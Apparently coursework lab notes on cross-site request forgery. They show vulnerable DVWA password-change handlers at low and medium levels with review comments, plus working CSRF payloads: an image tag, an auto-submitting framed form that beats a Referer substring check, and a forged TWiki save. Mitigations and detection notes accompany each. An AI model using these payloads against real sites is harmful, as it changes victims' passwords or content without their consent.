DVWA: low

// vulnerabilities/csrf/source/low.php   

// Excerpt of the DVWA "low" password-change handler (the listing is cut off after the
// comparison below). The change is triggered by a plain GET request, and nothing visible
// here binds the request to a form the application itself served: there is no anti-CSRF
// token and no current-password check. A request that the victim's browser sends with its
// existing session is therefore indistinguishable from a legitimate one.
// Mitigation: accept the change only via POST, require an unpredictable per-session token
// (compared with hash_equals()) and the current password; SameSite cookies are defence in
// depth, not a replacement for the token.
if (isset($_GET['Change'])) {
	// Turn requests into variables
	$pass_new = $_GET['password_new'];
	$pass_conf = $_GET['password_conf'];

	// The only check visible in this excerpt: both new-password fields must match (loose ==).
	if (($pass_new == $pass_conf)){

DVWA: low

<!-- Demonstration for the "low" handler: the browser fetches the image URL as an ordinary
     GET, so the state-changing request is issued just by rendering the page. This is why a
     password change must not be reachable via GET and must require a token the embedding
     page cannot know. Detection: such a request arrives as a cross-site image subresource
     (foreign Referer; Sec-Fetch-Site: cross-site and Sec-Fetch-Dest: image in browsers that
     send Fetch Metadata), which a server or WAF can reject or log. -->
<img src="http://192.168.1.103/dvwa/
  vulnerabilities/csrf/?Change=true&password_new=santa&password_conf=santa"
/>

DVWA: medium

// vulnerabilities/csrf/source/medium.php   

// Excerpt of the DVWA "medium" password-change handler (the listing is cut off after the
// comparison below). It puts a Referer check in front of the same GET-driven change; no
// anti-CSRF token is visible here either.
if (isset($_GET['Change'])) {

	// Checks the http referer header
	// NOTE(review): weak as an origin check. eregi() performs an unanchored, case-insensitive
	// regex match, so the test passes when "127.0.0.1" appears anywhere in the Referer value
	// (host, path or query string), and the unescaped dots match any character. The Referer
	// header is also optional and can be stripped by the client or by policy. eregi() was
	// deprecated in PHP 5.3 and removed in PHP 7.0.
	// Prefer a per-session anti-CSRF token; if an origin check is kept as an extra layer,
	// parse the header and compare scheme and host exactly against an allow-list.
	if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
		// Turn requests into variables
		$pass_new = $_GET['password_new'];
		$pass_conf = $_GET['password_conf'];

		// Same loose equality check on the two new-password fields as in the "low" handler.
		if ($pass_new == $pass_conf){

DVWA: medium

<iframe src="/csrf-exploits/127.0.0.1/medium.html"></iframe/>
<!-- /csrf-exploits/127.0.0.1/medium.html -->
<!-- Why the "medium" Referer check does not help: the framed page is served from a path
     that contains the string 127.0.0.1, so the Referer sent with the form submission
     satisfies the substring match in medium.php although the request is cross-site.
     A substring or regex test on the Referer is not an origin check; the fix is a
     per-session token in the form, validated server-side, with the change accepted only
     via POST. -->
<form name="frmCSRF" action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
  <input type="hidden" name="Change" value="true" />
  <input type="hidden" name="password_new" value="xkcd" />
  <input type="hidden" name="password_conf" value="xkcd" />
</form>

<script type="text/javascript">
// Submits the form as soon as the framed document has loaded, without user interaction.
document.body.onload = function() {
  document.frmCSRF.submit();
}
</script>

TWiki

<!-- Same pattern against a different application: an auto-submitted cross-site form aimed
     at a state-changing endpoint (a TWiki topic save). The form has no method attribute,
     so it is submitted with GET, and it carries no per-request token.
     NOTE(review): presumably the TWiki version used in this demo accepts a save without
     such a token; confirm against the version under test.
     Mitigation on the server side: accept saves only via POST and require a
     server-validated anti-CSRF token bound to the user's session. -->
<form name="frmCSRF" action="http://192.168.1.103/twiki/bin/save/Main/yippie">
  <input type="hidden" name="cmd" value="" />
  <input type="hidden" name="formtemplate" value="" />
  <input type="hidden" name="topicparent" value="" />
  <input type="hidden" name="text" value="hurray" />
</form>

<script type="text/javascript">
// Submits the form as soon as the document has loaded, without user interaction.
document.body.onload = function() {
  document.frmCSRF.submit();
}
</script>



assignments.part(2);